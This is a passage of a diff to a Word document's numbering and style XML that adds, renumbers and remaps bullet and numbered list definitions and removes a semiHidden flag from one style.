+      <w:pPr>
+        <w:ind w:left="6000" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6B514737"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="40090019"/>
@@ -4842,7 +8755,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6BA328B1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A0DA76FE"/>
@@ -4955,7 +8868,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6C5676BB"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="86AA917A"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6C7A4A29"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4D6825E8"/>
@@ -5045,7 +9071,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CC87F05"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4A10C85C"/>
@@ -5158,7 +9184,233 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6F9C7FE9"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1650618E"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4560" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5280" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6000" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="72FF6303"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8BD4BBA2"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4560" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5280" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6000" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="74E0107D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9DDC6F4A"/>
@@ -5248,71 +9500,324 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="75E94B0D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="F9340754"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7CEF2B0A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="CB9251B4"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4560" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5280" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6000" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="180315888">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1004741868">
+    <w:abstractNumId w:val="24"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1334993133">
+    <w:abstractNumId w:val="17"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="203686511">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="668142047">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="58603787">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="288358489">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="842668986">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="226453402">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="843084560">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="445344348">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="1685356120">
+    <w:abstractNumId w:val="22"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="443425727">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="574441841">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="1022240294">
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="733699679">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="697855704">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="1208376380">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="19" w16cid:durableId="757600007">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="20" w16cid:durableId="2022774349">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="21" w16cid:durableId="992635637">
+    <w:abstractNumId w:val="28"/>
+  </w:num>
+  <w:num w:numId="22" w16cid:durableId="220868882">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="1877620264">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="1292394528">
+    <w:abstractNumId w:val="30"/>
+  </w:num>
+  <w:num w:numId="25" w16cid:durableId="1222013244">
+    <w:abstractNumId w:val="29"/>
+  </w:num>
+  <w:num w:numId="26" w16cid:durableId="73825754">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="27" w16cid:durableId="1526476731">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="1004741868">
-    <w:abstractNumId w:val="19"/>
+  <w:num w:numId="28" w16cid:durableId="844393221">
+    <w:abstractNumId w:val="26"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="1334993133">
-    <w:abstractNumId w:val="14"/>
-  </w:num>
-  <w:num w:numId="4" w16cid:durableId="203686511">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="5" w16cid:durableId="668142047">
+  <w:num w:numId="29" w16cid:durableId="1724409312">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="58603787">
-    <w:abstractNumId w:val="9"/>
+  <w:num w:numId="30" w16cid:durableId="1672677058">
+    <w:abstractNumId w:val="27"/>
   </w:num>
-  <w:num w:numId="7" w16cid:durableId="288358489">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="8" w16cid:durableId="842668986">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="226453402">
-    <w:abstractNumId w:val="12"/>
-  </w:num>
-  <w:num w:numId="10" w16cid:durableId="843084560">
+  <w:num w:numId="31" w16cid:durableId="363675721">
     <w:abstractNumId w:val="20"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="445344348">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="1685356120">
-    <w:abstractNumId w:val="18"/>
-  </w:num>
-  <w:num w:numId="13" w16cid:durableId="443425727">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
-  <w:num w:numId="14" w16cid:durableId="574441841">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="15" w16cid:durableId="1022240294">
-    <w:abstractNumId w:val="16"/>
-  </w:num>
-  <w:num w:numId="16" w16cid:durableId="733699679">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="17" w16cid:durableId="697855704">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="18" w16cid:durableId="1208376380">
-    <w:abstractNumId w:val="10"/>
-  </w:num>
-  <w:num w:numId="19" w16cid:durableId="757600007">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="20" w16cid:durableId="2022774349">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="21" w16cid:durableId="992635637">
-    <w:abstractNumId w:val="21"/>
-  </w:num>
-  <w:num w:numId="22" w16cid:durableId="220868882">
-    <w:abstractNumId w:val="11"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5786,7 +10291,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
